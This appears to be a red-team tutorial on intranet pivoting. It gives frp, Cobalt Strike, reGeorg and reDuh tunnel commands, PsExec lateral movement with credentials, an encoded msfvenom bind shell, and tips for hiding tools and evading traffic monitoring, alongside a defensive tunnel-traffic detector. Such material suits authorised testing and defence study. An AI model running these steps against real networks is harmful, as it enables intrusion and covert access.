Title: How to play intranet penetration in actual combat

Preface

In intranet penetration, getting a WebShell or a CobaltStrike or Metasploit session is only the beginning; most of the work is moving laterally inside the intranet, expanding the foothold and reaching the core segments. The prerequisite for post-exploitation is a dedicated channel into the intranet through which further attacks can be carried out. In practice, which technique can be used depends on the network environment, and this page walks through the common cases.

The following is a mind map summarising "The way of intranet penetration in actual combat":

[Mind map image: intranet penetration techniques grouped by network environment]

Target outbound (socks proxy)

This is the network environment you most hope to meet in practice. The target machine can reach the Internet normally, so a socks proxy (or a CobaltStrike Beacon) can be run directly on the target to open a channel into its intranet.

Frp (socks5)

Frp server configuration file (frps.ini):

[common]
bind_port=8080

Frp client configuration file (frpc.ini):

[common]
server_addr=xx.xx.xx.xx
server_port=8080
# use a common web port for the service port

[socks5]
type=tcp
remote_port=8088
plugin=socks5
use_encryption=true
use_compression=true
# socks5 credentials (uncomment to require authentication on the proxy)
#plugin_user=SuperMan
#plugin_passwd=XpO2McWe6nj3

Encryption and compression are both enabled here; neither is on by default. According to the frp author's documentation, the compression algorithm is snappy.

use_encryption=true enables encryption: the content exchanged between frpc and frps is encrypted, so traffic intercepted on that leg cannot be read.

use_compression=true enables compression: the transmitted content is compressed, which reduces network traffic and speeds up forwarding at the cost of some additional CPU.

Both options are per-proxy settings and must be placed under the relevant proxy section (here [socks5]), not under [common]. Note that this is the legacy INI format; recent frp releases use a TOML configuration with renamed keys, so match the configuration to the frp version on hand. After the frp client binary and its configuration file have been transferred to the target machine, rename both and place them in a system-related folder so they are less conspicuous.

Comparison with and without encryption and compression: with an frpc configuration that does not enable encryption and compression, a Metasploit ms17_010 scan run through the socks proxy can be read straight out of the captured packets, and the specific attack behaviour is plainly identifiable. If the target intranet has security equipment such as a situational awareness platform or traffic analysis, the activity will be noticed and the foothold will be lost.

After enabling encryption and compression, the attack source address is still exposed (the frps address is visible as the peer of the frpc connection), but the content of the packets can no longer be distinguished, which evades content-based monitoring inside the intranet. One caveat: frp's encryption covers only the frpc-to-frps leg. The probes frpc sends into the intranet on the proxy's behalf (the SMB packets themselves) are still plaintext on the internal segment, where a sensor sitting between frpc and the target will see them.

CobaltStrike (socks4a)

In the Beacon console of the controlled target machine, start the socks proxy:

beacon> socks 1024    # choose the port according to the VPS

Open View > Proxy Pivots in the menu bar; copy the proxy settings into Metasploit (the Tunnel button gives a ready-made setg Proxies line), or point other security tools at the socks4a port directly.

Bringing machines that cannot reach the Internet online: these are chained links, and as soon as the parent (outbound) Beacon disconnects, every link hanging off it disconnects too!

SMB Beacon

Official description of the SMB Beacon: it uses a named pipe to communicate through a parent Beacon. When two Beacons are linked, the child Beacon receives its tasks from the parent and sends its output back through it. Because linked Beacons talk over Windows named pipes, the traffic is encapsulated in the SMB protocol, which makes the SMB Beacon relatively covert on segments where host-to-host SMB is normal (on segments where workstation-to-workstation SMB is unusual, the named-pipe connection itself is worth detecting).

Create an SMB listener (the host and port fields can be left as they are). When spawning it, be careful which listener and which session you pick: spawn from a session on a host that has a route to the target.

After it runs successfully the session list shows ∞∞ in the last-seen column, which is the connected state of the spawned SMB Beacon.

From the parent Beacon, link <host> connects to the SMB Beacon's named pipe and unlink <host> drops the link:

beacon> link 192.168.144.155
beacon> unlink 192.168.144.155

Link listener: create a listener of the link type on the team server. Its payload does not call out; it waits on the target to be linked from a Beacon that already has a session.

Export the executable or DLL that corresponds to this listener type, selecting the listener just created.

Upload the generated payload to the currently online target machine. Sysinternals PsExec.exe is used here rather than Cobalt Strike's own lateral-movement commands, which the author finds insufficient for this. From the Beacon, PsExec copies the payload to the target that has no Internet access, runs it, and the new Beacon comes online through the link:

beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

-accepteula suppresses the licence prompt, -d does not wait for the remote process to exit, and -c copies the local file to the remote host before running it. Confirm that the payload is listening for the link (the default bind port is 4444):

beacon> shell netstat -ano | findstr 4444

SSH login

From the Beacon, open SSH sessions to the Linux hosts through the compromised Windows machine:

beacon> ssh 192.168.144.174:22 root admin
beacon> ssh 192.168.144.203:22 root admin

Checking the network connections on a Linux target shows that the SSH session actually comes from the previously compromised Windows host, not from the attacker's address.

Target with no Internet access (http proxy)

The target network may have firewalls, gateway devices and so on that allow nothing but inbound HTTP to the web application; the server itself cannot reach the Internet. The socks methods above are not feasible, and the only way in is an HTTP tunnel through the web shell.

reGeorg (socks5)

python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

With Metasploit pointed at the reGeorg socks proxy and scanning for ms17_010, the packets carried inside the HTTP tunnel are plaintext and the attack behaviour is plainly identifiable in a capture.

Neo-reGeorg (encrypted)

python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx

The key passed with -k must be the same one used when generating the neo-tunnel.aspx script. With Neo-reGeorg the tunnel payloads are transmitted encrypted.
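To make the two comparisons above concrete (plaintext frp versus frp with use_encryption, and reGeorg versus Neo-reGeorg), here is an added example written for this page; it is not code from reGeorg, Neo-reGeorg, frp or the page's author. It is the content check a traffic-analysis sensor would run over tunnel request bodies: it flags bodies that carry an SMB header in the clear, which is what the unencrypted tunnels leak, and separately flags high-entropy bodies, which is all an encrypted tunnel leaves behind. The request paths, the reGeorg query-string form, the 10.10.1.20 target and the form post are all constructed for the example, not taken from the page.

```python
import hashlib
import math

# SMB1 and SMB2/3 header magics: the first bytes any ms17_010 check, share
# enumeration or psexec-style session puts on the wire.
SMB_MAGICS = (b"\xffSMB", b"\xfeSMB")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted or compressed payloads, far lower
    for protocol chatter full of fixed headers and zero padding."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_body(body: bytes, entropy_threshold: float = 7.0) -> str:
    """Content check for one HTTP request body. 'smb-in-tunnel' means the attack
    is readable in the clear; 'opaque' means the body is encrypted or compressed
    and can only be judged by metadata (size, timing, destination)."""
    if any(magic in body for magic in SMB_MAGICS):
        return "smb-in-tunnel"
    if len(body) >= 64 and shannon_entropy(body) >= entropy_threshold:
        return "opaque"
    return "benign"


def flag_tunnel_requests(requests):
    """requests: iterable of (method, path, body). Returns [(path, verdict), ...]."""
    return [(path, classify_body(body)) for _method, path, body in requests]


# --- Constructed sample traffic for this example (not real captures) ---

# 1) reGeorg forwarding a raw SMB1 NEGOTIATE through tunnel.aspx: the SMB header
#    travels in the HTTP body unchanged.
SMB_NEGOTIATE = (
    b"\x00\x00\x00\x2f"                 # NetBIOS session header, 47 bytes follow
    + b"\xffSMB\x72"                    # SMB1 magic + SMB_COM_NEGOTIATE
    + b"\x00\x00\x00\x00\x18\x01\x28"   # NT status, flags, flags2
    + b"\x00" * 20                      # pid_high, signature, reserved, tid, pid, uid, mid
    + b"\x00\x0c\x00"                   # word count 0, byte count 12
    + b"\x02NT LM 0.12\x00"             # one dialect string
)

# 2) Neo-reGeorg carrying the same probe after the tunnel encrypted it. Chained
#    SHA-256 digests stand in for ciphertext: deterministic, but statistically
#    indistinguishable from random bytes.
ENCRYPTED_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))

# 3) An ordinary form post from a legitimate user of the same web application.
FORM_POST = b"username=alice&password=Winter2024!&remember=1"

SAMPLE_REQUESTS = [
    ("POST", "/tunnel.aspx?cmd=forward&target=10.10.1.20&port=445", SMB_NEGOTIATE),
    ("POST", "/neo-tunnel.aspx", ENCRYPTED_BLOB),
    ("POST", "/login.aspx", FORM_POST),
]

if __name__ == "__main__":
    for path, verdict in flag_tunnel_requests(SAMPLE_REQUESTS):
        print(f"{verdict:14} {path}")
```

Encryption removes the content signature but not the traffic signature: a steady stream of high-entropy POST bodies to a single .aspx URL is itself something a sensor can key on, so the encrypted tunnel buys time rather than invisibility.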

Ice Scorpion / Behinder (open socks5)

Ice Scorpion's (Behinder's) traffic is encrypted and it also offers a socks proxy, but packets are lost in transit. Using Metasploit through it to check ms17_010 reports the vulnerability as absent, whereas the same check without the proxy shows that it is present.

Although scanning through Ice Scorpion's proxy is not as reliable as through reGeorg, port scans with a small number of threads, such as auxiliary/scanner/portscan/tcp, are feasible. Accuracy is determined mostly by how many packets a given check has to exchange and by how the tunnel transports them.

reDuh (single-port forwarding)

When the target's middleware or other services are old versions on which the reGeorg or Ice Scorpion tunnel scripts cannot be parsed or run, another HTTP proxy script is needed. This is an environment met in a real engagement:

reDuh is used as the example here. It only forwards specified ports (interactive graphical sessions are not practical through it), but the workaround is to generate a bind shell payload with msfvenom, bring it into Metasploit through a reDuh single-port forward, and finally use the socks4a module to open a proxy. The specific steps:

sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe

--platform   target platform of the payload
-p           payload; shell_bind_tcp listens on the target (here port 53) and waits to be connected to
-e           encoder to use
-i           number of encoding iterations
-f, -o       output format and output file

Upload the payload to the target server and execute it.

Metasploit's handler is pointed at the local address and port where reDuh will deliver the forwarded connection, not at the target:

sudo msfconsole -q
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
msf5 exploit(multi/handler) > set lport 5353
msf5 exploit(multi/handler) > run -j

After reDuhServer (reduh.aspx) has been uploaded to the target, connect with reDuhClient, then telnet to the client's local control port and create the tunnel that maps local port 5353 to port 53 on the target's loopback, where the bind shell is listening:

java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspx

telnet 127.0.0.1 1010
[createTunnel]5353:127.0.0.1:53

Once the handler has the shell you can continue in Metasploit, or start a socks4a server and attach other security tools to it:

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 10080
msf5 auxiliary(server/socks4a) > run -j

(In current Metasploit releases the socks4a and socks5 modules have been merged into auxiliary/server/socks_proxy, selected with the VERSION option.)

Why the payload is a plain shell rather than Meterpreter: Meterpreter is a large, chatty payload that needs many packets to stage and to operate, and this single-port HTTP forward is already unstable. Meterpreter would only make the "thin pipe" more unstable!

Isolated network (multi-level proxy)

During intranet penetration you will meet isolated networks, most often logically isolated (VLANs, ACLs) rather than physically separated. The way through is to obtain a foothold on a springboard machine that has a route into the isolated segment (a multi-homed host, an operations and maintenance machine, etc.) and build first-, second- and third-level proxies through it.

FRP: with a dual-NIC intranet server in hand, frp can be used to build the channel. This server acts as both frp server (for the frpc on the next layer) and frp client (to the frps on the previous layer).

Proxifier: once the frp tunnel is up, add two proxies in Proxifier, the external-network socks on the VPS and the intranet socks on the dual-NIC server, and create a proxy chain from them. Note the proxy order: the chain is traversed in the order listed, so the proxy the attacker can reach directly goes first.

Set proxy rules and select the corresponding proxy chain.

The second-level proxy works: port 445 on the isolated intranet machine can now be probed.
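What a Proxifier chain (and proxychains' strict_chain) actually does is a series of SOCKS5 negotiations on one TCP connection. The following is an added example, not code from frp, Proxifier or the page's author: a minimal SOCKS5 client (RFC 1928 CONNECT with RFC 1929 username/password, the same credentials that frp's plugin_user/plugin_passwd would demand) that connects to the first hop and asks each hop to CONNECT to the next, so the final socket speaks to the target through every proxy in the list. The hop addresses in the usage note are placeholders; scripted_handshake is an offline dry run that exists so the encoder can be checked without a live proxy.

```python
import socket
import struct

# RFC 1928 (SOCKS5) and RFC 1929 (username/password sub-negotiation) constants.
SOCKS_VER, CMD_CONNECT = 0x05, 0x01
METHOD_NO_AUTH, METHOD_USERPASS, METHOD_NONE_ACCEPTABLE = 0x00, 0x02, 0xFF
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED = 0x00


class SocksError(Exception):
    pass


def build_greeting(with_userpass: bool) -> bytes:
    """VER, NMETHODS, METHODS. Offer user/pass only when we hold credentials."""
    methods = bytes([METHOD_NO_AUTH, METHOD_USERPASS]) if with_userpass else bytes([METHOD_NO_AUTH])
    return bytes([SOCKS_VER, len(methods)]) + methods


def build_userpass(username: str, password: str) -> bytes:
    """RFC 1929 request: sub-version 1, ULEN, UNAME, PLEN, PASSWD."""
    u, p = username.encode(), password.encode()
    return bytes([0x01, len(u)]) + u + bytes([len(p)]) + p


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request. IPv4 literals use ATYP 1; names are sent as ATYP 3 so the
    proxy resolves them and no DNS query leaks from the attacker's side."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise SocksError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def read_connect_reply(sock: socket.socket) -> int:
    """Consume a whole reply, including the variable-length BND.ADDR, and return REP."""
    ver, rep, _rsv, atyp = _recv_exact(sock, 4)
    if ver != SOCKS_VER:
        raise SocksError(f"unexpected version {ver}")
    if atyp == ATYP_IPV4:
        _recv_exact(sock, 4)
    elif atyp == ATYP_DOMAIN:
        _recv_exact(sock, _recv_exact(sock, 1)[0])
    elif atyp == ATYP_IPV6:
        _recv_exact(sock, 16)
    else:
        raise SocksError(f"unexpected address type {atyp}")
    _recv_exact(sock, 2)  # BND.PORT
    return rep


def socks5_connect(sock, host, port, username=None, password=None):
    """One full negotiation on a connected socket; afterwards it carries a stream to host:port."""
    sock.sendall(build_greeting(username is not None))
    ver, method = _recv_exact(sock, 2)
    if ver != SOCKS_VER or method == METHOD_NONE_ACCEPTABLE:
        raise SocksError("proxy rejected every offered auth method")
    if method == METHOD_USERPASS:
        if username is None:
            raise SocksError("proxy demands credentials we do not have")
        sock.sendall(build_userpass(username, password))
        if _recv_exact(sock, 2)[1] != 0x00:
            raise SocksError("socks credentials rejected")
    elif method != METHOD_NO_AUTH:
        raise SocksError(f"unsupported auth method {method}")
    sock.sendall(build_connect(host, port))
    rep = read_connect_reply(sock)
    if rep != REP_SUCCEEDED:
        raise SocksError(f"CONNECT {host}:{port} refused by proxy, REP={rep}")


def chain_connect(hops, target, timeout=10):
    """hops: [(host, port, user, passwd), ...] ordered from the attacker outwards.
    TCP-connect to hop 0, ask each hop to CONNECT to the next, and the last hop to
    CONNECT to the target. Hop N must be reachable from hop N-1: that is the order rule."""
    sock = socket.create_connection(hops[0][:2], timeout=timeout)
    for i, (_host, _port, user, pw) in enumerate(hops):
        nxt = hops[i + 1][:2] if i + 1 < len(hops) else target
        socks5_connect(sock, nxt[0], nxt[1], user, pw)
    return sock


def scripted_handshake(replies: bytes, host, port, username=None, password=None) -> bytes:
    """Offline dry run: play scripted proxy replies through a socketpair and return
    exactly what the client put on the wire, for comparison against a capture."""
    client, proxy = socket.socketpair()
    try:
        proxy.sendall(replies)
        socks5_connect(client, host, port, username, password)
        client.shutdown(socket.SHUT_WR)
        out = b""
        while chunk := proxy.recv(4096):
            out += chunk
        return out
    finally:
        client.close()
        proxy.close()
```

Usage against the two-layer setup above would be chain_connect([("xx.xx.xx.xx", 8088, "SuperMan", "XpO2McWe6nj3"), ("192.168.144.100", 8089, None, None)], ("10.10.1.20", 445)) with the VPS frps first and the dual-NIC server's socks second (both addresses are placeholders); swapping the two hops fails at the first CONNECT, because the VPS cannot reach the intranet address directly, which is the "note the proxy order" point in practice.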

Proxychains: the command-line equivalent of the Proxifier setup. Set the second-level proxy and the socks credentials in its configuration file. (Again, note the proxy order.)
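An added example of the matching proxychains configuration, written for this page rather than taken from it: under strict_chain the list is traversed top to bottom, so the VPS-side socks that the attacker can reach directly comes first and the intranet-side socks, reachable only through it, second. Credentials go on the line of the proxy that requires them (the plugin_user/plugin_passwd values from the frpc section above). The 192.168.144.100 address and port 8089 for the dual-NIC server's socks are assumptions.

```ini
# /etc/proxychains4.conf (added example; addresses are placeholders)
strict_chain            # use every proxy, in the listed order; dynamic_chain would skip dead hops
proxy_dns               # resolve names through the chain instead of leaking DNS from the attacker box
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# first hop: frps socks5 on the VPS, authenticated with the frpc plugin credentials
socks5 xx.xx.xx.xx 8088 SuperMan XpO2McWe6nj3
# second hop: socks5 on the dual-NIC server, reachable only through the first hop
socks5 192.168.144.100 8089
```

With strict_chain, listing the intranet proxy first fails immediately because the attacker's machine has no route to it; that is the order mistake the page warns about, and the error surfaces as a timeout on the first hop rather than a clear message.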
